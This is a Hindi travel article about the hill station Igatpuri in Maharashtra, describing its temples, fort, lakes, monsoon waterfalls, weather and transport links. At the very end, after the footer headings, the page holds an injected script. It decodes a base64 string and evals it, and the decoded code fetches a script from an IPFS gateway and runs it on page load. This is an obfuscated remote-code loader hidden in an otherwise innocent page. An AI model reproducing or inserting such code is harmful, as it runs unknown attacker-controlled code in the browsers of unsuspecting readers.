इगतपुरी

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

इगतपुरी एक ख़ूबसूरत पहाड़ी स्थान है, जो नासिक ज़िला, महाराष्ट्र में स्थित है। यह स्थान महाराष्ट्र के कुछ महत्त्वपूर्ण और बहुत ही पसन्दीदा पहाड़ी क्षेत्रों में से एक है। इगतपुरी सहयाद्रि पर्वतमाला से घिरा हुआ एक अनोखा हिल स्टेशन है। यहाँ का मौसम पूरे वर्ष सुहावना और स्वास्थ्यप्रद रहता है। कुछ समय की गर्मियाँ बहुत गर्म ओर सूखी हो सकती हैं। यहाँ मानसून के दिनों में दूध जैसे सफ़ेद झरनों के कारण यहाँ का दृश्य देखते ही बनता है। यहाँ आने वाले यात्री ट्रैकिंग और रिवर राफ्टिंग का आनन्द ले सकते हैं।

दर्शनीय स्थल

इगतपुरी में पूरे वर्ष भर आने वाले यात्री और पर्यटकों के लिए कई आकर्षक और मनोरम स्थल हैं, जिनका दर्शन किया जा सकता है।

  • यह स्थान अपने प्राचीन और स्थानीय मंदिरों के लिए जाना जाता है। यहाँ आने पर 'घाटनदेवी मंदिर' के दर्शन किये जा सकते हैं। घाटों की रक्षक घाटनदेवी को समर्पित इस मंदिर से नीचे की घाटी और सहयाद्रि पर्वतमाला के ख़ूबसूरत नज़ारे देखे जा सकते हैं।
  • यहाँ आने पर 'विपास्सना केंद्र' भी जाया जा सकता है। यह एक ऐसा केंद्र, है जहाँ ध्यान योग का पूरा ज्ञान करवाया जाता है और व्यक्ति सालों से हो रहे इस योग का महत्व जान सकते हैं।
  • यदि पर्यटक इतिहास और वास्तुकला के प्रेमी हैं तो 'त्रिंगलवाड़ी क़िला' देख सकते हैं। समुद्रतल से 3000 फीट ऊपर बने इस शाही क़िले से नीचे बसा पूरा इगतपुरी शहर और सहयाद्रि पर्वतमाला का अद्भुत व मनभावन नज़ारा देखा जा सकता है।
  • इतिहास प्रसिद्ध मराठा प्रमुख शिवाजी के जीवन को दर्शाता 'वालावलकर संग्रहालय' एक अनोखा संग्रहालय है, जो पर्यटकों को आकर्षित करने की पूरी क्षमता रखता है। यहाँ आने पर यात्री 'वड़ा पाव' अवश्य खाते हैं। यहाँ का वड़ा पाव बहुत प्रसिद्ध है।

अन्य प्रमुख स्थान

1,900 फीट की उँचाई पर, निर्मल झरनों और घने जंगलों के कारण इगतपुरी की ख़ूबसूरती देखते ही बनती है। शहरीकरण न होने के कारण इस जगह की वायु बहुत निर्मल है। यहाँ अक्सर आने वाले यात्री इस बात से सहमत दिखाई देते हैं कि यहाँ आने पर भाग-दौड़ भरी ज़िंदगी की थकान दूर हो जाती है। त्रिंगलवाड़ी क़िले के पास स्थित 'त्रिंगलवाड़ी झील' के किनारे यात्री अपने परिवार के साथ एक शांत शाम बिता सकते हैं। प्रकृति प्रेमियों के लिए यहाँ अनेक प्रकार के पेड़-पौधे और पक्षियों की प्रजातियाँ हैं। इस जगह पर ट्रैकिंग के लिए भी बहुत सारे स्थल हैं। भत्सा नदी घाटी, एक और ऐसी जगह है, जहाँ शांति से कुछ पल बिताये जा सकते हैं। ख़ूबसूरत वैतरणा बांध सारे शहर के लिए न केवल पानी का स्रोत है, बल्कि घूमने के लिए भी एक अच्छी जगह भी है। कैमल घाटी पर यात्री रिवर राफ्टिंग और रिवर क्रासिंग जैसी गतिविधियों का मज़ा ले सकते हैं। यहाँ आने पर प्रकृति को निहारने और सूर्यास्त देखने जैसी गतिविधियों का मज़ा बढ़ जाता है।

मौसम

इगतपुरी का मौसम साल भर सुहावना और स्वास्थ्यप्रद रहता है। कुछ समय की गर्मिया बहुत गर्म ओर सूखी हो सकती हैं। इस समय अक्सर लोग यहाँ नहीं आते। इसके बाद आने वाला मानसून राहत लेकर आता है। इस समय इगतपुरी एक हरे स्वर्ग में बदल जाता है, जहाँ दूध जैसे सफ़ेद झरनों के कारण यहाँ का दृश्य देखते ही बनता है। यहाँ आने के लिए सर्दियों का समय भी ठीक है, क्योंकि इस समय तापमान घूमने, ट्रैकिंग और नज़ारें देखने के लिए उपयुक्त होता है।

कैसे पहुँचें

हवाई यात्रा पसंद करने वाले पर्यटकों के लिए लगभग 140 कि.मी. दूर मुंबई का 'छत्रपति शिवाजी हवाई अड्डा' सबसे निकटतम अंतराष्ट्रीय हवाई अड्डा है। भारत से ही आने वाले अन्य यात्रियों के लिए सबसे निकट नासिक का घरेलू हवाई अड्डा है। महाराष्ट्र तथा दूसरे राज्यों के शहरों से यहाँ आने के लिए नियमित रेलगाड़ियाँ उपलब्ध हैं। स्थानीय रेलगाड़ियाँ केवल कसार तक ही जाती हैं, जहाँ से पहाड़ी तक जाने के लिए बस से यात्रा करनी होती है या फिर शुरु में ही लंबे मार्ग की बस ले सकते हैं। सड़क मार्ग से आने के लिए यात्री अपनी स्वयं की गाड़ी से सुंदर घाटों से होते हुए इस जगह पहुँच सकते हैं या फिर अपने शहर से बस द्वारा आ सकते हैं।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>